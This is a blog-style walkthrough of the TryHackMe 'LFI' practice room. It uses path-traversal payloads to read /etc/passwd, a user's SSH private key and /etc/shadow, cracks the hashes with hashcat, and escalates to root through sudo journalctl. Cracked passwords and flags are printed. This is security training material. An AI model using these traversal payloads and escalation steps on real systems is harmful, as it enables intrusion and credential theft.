11 KiB
TryHackMe-LFI
Abdullah Rizwan | 09:21 AM , 4th November ,2020
LFI
Local File Inclusion (LFI) is the vulnerability that is mostly found in web servers. This vulnerability is exploited when a user input contains a certain path to the file which might be present on the server and will be included in the output. This kind of vulnerability can be used to read files containing sensitive and confidential data from the vulnerable system.
The main cause of this type of Vulnerability is improper sanitization of the user's input. Sanitization here means that whatever user input should be checked and it should be made sure that only the expected values are passed and nothing suspicious is given in input. It is a type of Vulnerability commonly found in PHP based websites but isn't restricted to them.
Testing for LFI
To test for LFI what we need is a parameter on any URL or any other input fields like request body etc. For example, if the website is tryhackme.com then a parameter in the URL can look like https://tryhackme.com/?file=robots.txt. Here file is the name of the parameter and robots.txt is the value that we are passing (include the file robots.txt).
Importance of Arbitrary file reading
A lot of the time LFI can lead to accessing (without the proper permissions) important and classified data. An attacker can use LFI to read files from your system which can give away sensitive information such as passwords/SSH keys; enumerated data can be further used to compromise the system.
In this task, we are going to find the parameter which is vulnerable to the Local File Inclusion attack. We will then will try to leverage information obtained to get access to the system.
Once we find the vulnerable parameter we can try to include the passwd file on the Linux system i.e /etc/passwd. The most common technique is path traversal method meaning we can include files like ../../../../etc/passwd what this does it get out of a directory like we usually do in Linux system by running cd ../
../../etc/passwd means to go out twice from the current working directory and then go to /etc directory and read the passwd file. Now the issue with this method is you need to be sure about the path of the file.
NMAP
Host is up (0.17s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a8:b9:f0:d3:e4:b3:17:9c:7f:b6:7d:28:72:8a:e4:77 (RSA)
| 256 07:f2:d9:85:77:74:52:2a:73:76:70:35:73:70:c3:9e (ECDSA)
|_ 256 23:ba:e8:b6:8b:a2:ac:58:3b:f4:04:dc:6e:36:b7:f2 (ED25519)
80/tcp open http Werkzeug httpd 0.16.1 (Python 3.6.9)
|_http-title: Shop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
PORT 80
On visting web page
Try to navigate to different pages,and we see a parameter named page
The basic traversal for /etc/passwd in LFI is ../../../../etc/passwd but in this sceanrio ../../../etc/passwd is where LFI exists
root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin syslog:x:102:106::/home/syslog:/usr/sbin/nologin messagebus:x:103:107::/nonexistent:/usr/sbin/nologin _apt:x:104:65534::/nonexistent:/usr/sbin/nologin lxd:x:105:65534::/var/lib/lxd/:/bin/false uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin pollinate:x:109:1::/var/cache/pollinate:/bin/false falcon:x:1000:1000:falcon,,,:/home/falcon:/bin/bash sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
Now room tells us to read user falcon's private ssh key
Replacing /etc/passwd with /home/falcon/.ssh/id_rsa the path becomes ../../../home/falcon/.ssh/id_rsa and we can get the key
It is better to look it with the source code
Copy it in a new file and save it as id_rsa by changning it's permissions chmod 600
Logging in with SSH keeps failing because it needs his password so lets grab /etc/shadow to see his hash and crack it by going to ../../../etc/shadow
Hashcat
Use hashcat to crack sha512 hash , I came to know that it's a sha512 by looking at the fromat of it
hashcat -h | grep sha512
21000 | BitShares v0.x - sha512(sha512_bin(pass)) | Raw Hash
1710 | sha512($pass.$salt) | Raw Hash, Salted and/or Iterated
1720 | sha512($salt.$pass) | Raw Hash, Salted and/or Iterated
1740 | sha512($salt.utf16le($pass)) | Raw Hash, Salted and/or Iterated
1730 | sha512(utf16le($pass).$salt) | Raw Hash, Salted and/or Iterated
20200 | Python passlib pbkdf2-sha512 | Generic KDF
6500 | AIX {ssha512} | Operating System
1800 | sha512crypt $6$, SHA512 (Unix) | Operating System
21600 | Web2py pbkdf2-sha512 | Framework
root@kali:~# hashcat -a 0 --user -m 1800 ^C
root@kali:~# cd TryHackMe/Easy/LFI
root@kali:~/TryHackMe/Easy/LFI# hashcat -a 0 --user -m 1800 hash /usr/share/wordlists/rockyou.txt
Here --user tells that your hash contains a username so you want it to be ignored After waiting for sometime it will show you this output
$6$xQmTDVmT$hgSLG3ebs.8Tc/F4qqXNnvBBnG736EWpWKaprFVARjAsZ6JyoL4WaJdGv5.qddMWF4/MoJgN6Hekri8wyJ97k/:password09
Session..........: hashcat
Status...........: Cracked
Hash.Name........: sha512crypt $6$, SHA512 (Unix)
Hash.Target......: $6$xQmTDVmT$hgSLG3ebs.8Tc/F4qqXNnvBBnG736EWpWKaprFV...yJ97k/
Time.Started.....: Wed Nov 4 09:45:38 2020 (30 secs)
Time.Estimated...: Wed Nov 4 09:46:08 2020 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 625 H/s (12.84ms) @ Accel:16 Loops:512 Thr:1 Vec:4
Recovered........: 1/1 (100.00%) Digests
Progress.........: 18752/14344385 (0.13%)
Rejected.........: 0/18752 (0.00%)
Restore.Point....: 18688/14344385 (0.13%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:4608-5000
Candidates.#1....: soldado -> ladeda
In order to show the password
root@kali:~/TryHackMe/Easy/LFI# hashcat -a 0 --user --show -m 1800 hash /usr/share/wordlists/rockyou.txt
falcon:$6$xQmTDVmT$hgSLG3ebs.8Tc/F4qqXNnvBBnG736EWpWKaprFVARjAsZ6JyoL4WaJdGv5.qddMWF4/MoJgN6Hekri8wyJ97k/:password09
Now we can login into the box
Running sudo -l to check what can we run as sudo
falcon@walk:~$ sudo -l
Matching Defaults entries for falcon on walk:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User falcon may run the following commands on walk:
(root) NOPASSWD: /bin/journalctl
falcon@walk:~$
We can the user flag
drwxr-xr-x 5 falcon falcon 4096 Jan 30 2020 .
drwxr-xr-x 3 root root 4096 Jan 28 2020 ..
lrwxrwxrwx 1 root root 9 Jan 30 2020 .bash_history -> /dev/null
-rw-r--r-- 1 falcon falcon 220 Jan 28 2020 .bash_logout
-rw-r--r-- 1 falcon falcon 3771 Jan 28 2020 .bashrc
drwx------ 2 falcon falcon 4096 Jan 28 2020 .cache
drwx------ 3 falcon falcon 4096 Jan 28 2020 .gnupg
-rw------- 1 root root 36 Jan 29 2020 .lesshst
-rw-r--r-- 1 falcon falcon 807 Jan 28 2020 .profile
drwxr-xr-x 2 root root 4096 Jan 29 2020 .ssh
-rw-r--r-- 1 falcon falcon 0 Jan 29 2020 .sudo_as_admin_successful
-rw-r--r-- 1 falcon falcon 21 Jan 29 2020 user.txt
falcon@walk:~$ cat user.txt
B8LEGIF049JT4RTVWUG4
On visting GTFOBINS we might be able to escalate privileges
Privilege Escalation
Jan 28 19:00:21 walk kernel: x86/fpu: Supporting XSAVE feature 0x002: 'SSE registers'
Jan 28 19:00:21 walk kernel: x86/fpu: Supporting XSAVE feature 0x004: 'AVX registers'
Jan 28 19:00:21 walk kernel: x86/fpu: xstate_offset[2]: 576, xstate_sizes[2]: 256
Jan 28 19:00:21 walk kernel: x86/fpu: Enabled xstate features 0x7, context size is 832 bytes, using 'standard' form
Jan 28 19:00:21 walk kernel: e820: BIOS-provided physical RAM map:
Jan 28 19:00:21 walk kernel: BIOS-e820: [mem 0x0000000000000000-0x000000000009fbff] usable
Jan 28 19:00:21 walk kernel: BIOS-e820: [mem 0x000000000009fc00-0x000000000009ffff] reserved
Jan 28 19:00:21 walk kernel: BIOS-e820: [mem 0x00000000000f0000-0x00000000000fffff] reserved
Jan 28 19:00:21 walk kernel: BIOS-e820: [mem 0x0000000000100000-0x000000003ffeffff] usable
Jan 28 19:00:21 walk kernel: BIOS-e820: [mem 0x000000003fff0000-0x000000003fffffff] ACPI data
Jan 28 19:00:21 walk kernel: BIOS-e820: [mem 0x00000000fec00000-0x00000000fec00fff] reserved
Jan 28 19:00:21 walk kernel: BIOS-e820: [mem 0x00000000fee00000-0x00000000fee00fff] reserved
Jan 28 19:00:21 walk kernel: BIOS-e820: [mem 0x00000000fffc0000-0x00000000ffffffff] reserved
Jan 28 19:00:21 walk kernel: NX (Execute Disable) protection: active
Jan 28 19:00:21 walk kernel: random: fast init done
Jan 28 19:00:21 walk kernel: SMBIOS 2.5 present.
Jan 28 19:00:21 walk kernel: DMI: innotek GmbH VirtualBox/VirtualBox, BIOS VirtualBox 12/01/2006
Jan 28 19:00:21 walk kernel: Hypervisor detected: KVM
Jan 28 19:00:21 walk kernel: e820: update [mem 0x00000000-0x00000fff] usable ==> reserved
!/bin/bash
root@walk:~# whoami
root
root@walk:~# id
uid=0(root) gid=0(root) groups=0(root)
root@walk:~#
You could also priv esc by cracking root's password hash
root:$6$UVbVpBq4$O8f/Nk488RT95VcJpLl0WgwOuguU6kCRBVE3EHGHFviJJV9MNfb0GbK38WryIkx72d/DKh3HBprBYTcNJf0Xn0:hacking
And we are root ! We could have also read the root and user flag through LFI but its better this way